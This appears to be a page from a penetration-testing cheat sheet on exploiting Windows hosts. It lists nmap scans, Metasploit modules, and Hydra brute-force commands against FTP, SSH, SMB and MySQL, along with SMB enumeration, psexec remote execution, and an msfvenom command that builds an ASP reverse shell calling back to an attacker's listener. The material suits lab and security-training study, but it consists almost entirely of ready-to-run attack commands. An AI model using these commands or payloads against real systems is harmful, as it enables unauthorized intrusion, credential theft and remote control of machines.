🪟Windows Exploitation

Port Scanning & Enumeration - Windows

  • Conduct a common port scan

nmap -sV <ip>

  • Perform a port scan on ports 1 to 10000 and save output to "nmap_10k".

nmap -T4 -PA -sC -sV -p 1-10000 <ip> -oX nmap_10k

  • Perform a port scan on all ports and save output to "nmap_all".

nmap -T4 -PA -sC -sV -p- <ip> -oX nmap_all

  • Conduct a UDP port scan.

nmap -sU -sV -p- <ip>

  • msfconsole commands:

    • workspace -a <workspace_name> – Create a new workspace.

    • workspace – Display the current workspace.

    • db_import <nmap_scan_file_path> – Import an Nmap scan report into the database.

    • hosts – List discovered hosts in the current workspace.

    • services – List services associated with discovered hosts.

    • auxiliary/scanner/smb/smb_version – Use Metasploit to scan for SMB version information.

Targeting Microsoft IIS FTP

nmap -sV -p 21 --script=ftp-anon <target-IP>

  • Conduct an Nmap scan on port 21 with the "ftp-anon" script to check for anonymous FTP access.

hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip>

  • Use Hydra to perform a brute-force attack using a list of Unix usernames and passwords against the specified target.

msfvenom -p windows/shell/reverse_tcp LHOST=<our_IP> LPORT=<our_Port> -f asp > shell.aspx

  • Generate a reverse shell payload in ASP format using msfvenom, with the specified listener IP and port, and save it to a file named "shell.aspx".

Targeting OpenSSH

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip>

  • Use Hydra to perform a brute-force attack with the username "vagrant" and a list of Unix passwords against the specified target IP.

auxiliary/scanner/ssh/ssh_login

  • Use this Metasploit auxiliary module to scan for SSH servers and attempt to log in using provided credentials or default ones.

Targeting MySQL Database Server

nmap -sV -sC -p 3306,8585 <ip>

  • Conduct an Nmap scan with version detection and default scripts on ports 3306 and 8585 of the specified IP.

auxiliary/scanner/mysql/mysql_login

  • Use this Metasploit auxiliary module to scan for MySQL servers and attempt to log in using provided credentials or default ones.

mysql -u <user> -p <pass> -h <ip>

  • Use the MySQL client to connect to the specified IP using the given username and password.

Targeting SMB

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip> smb

  • Use Hydra to perform a brute-force attack with the username "administrator" and a list of Unix passwords against the SMB service on the specified IP.

smbclient -L <ip> -U <user-Name>

  • Use smbclient to list shares on the target IP, providing a username.

smbmap -u <user_name> -p <pass> -H <ip>

  • Utilize smbmap to enumerate shares on the target IP, providing a username and password.

enum4linux -u <user-name> -p <password> -U <ip>

  • Run enum4linux to gather information from the target IP using specified credentials.

auxiliary/scanner/smb/smb_enumusers

  • Use this Metasploit auxiliary module to enumerate user accounts on an SMB server.

python3 psexec.py Administrator@<ip>

  • Run the psexec.py script to attempt remote command execution as the Administrator user on the specified IP.

  • Ensure to look at the services and their versions for further analysis.

Hacker's Mantra:The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through. - Clifford Stoll

PreviousExploitation FrameworksNextLinux Exploitation

Last updated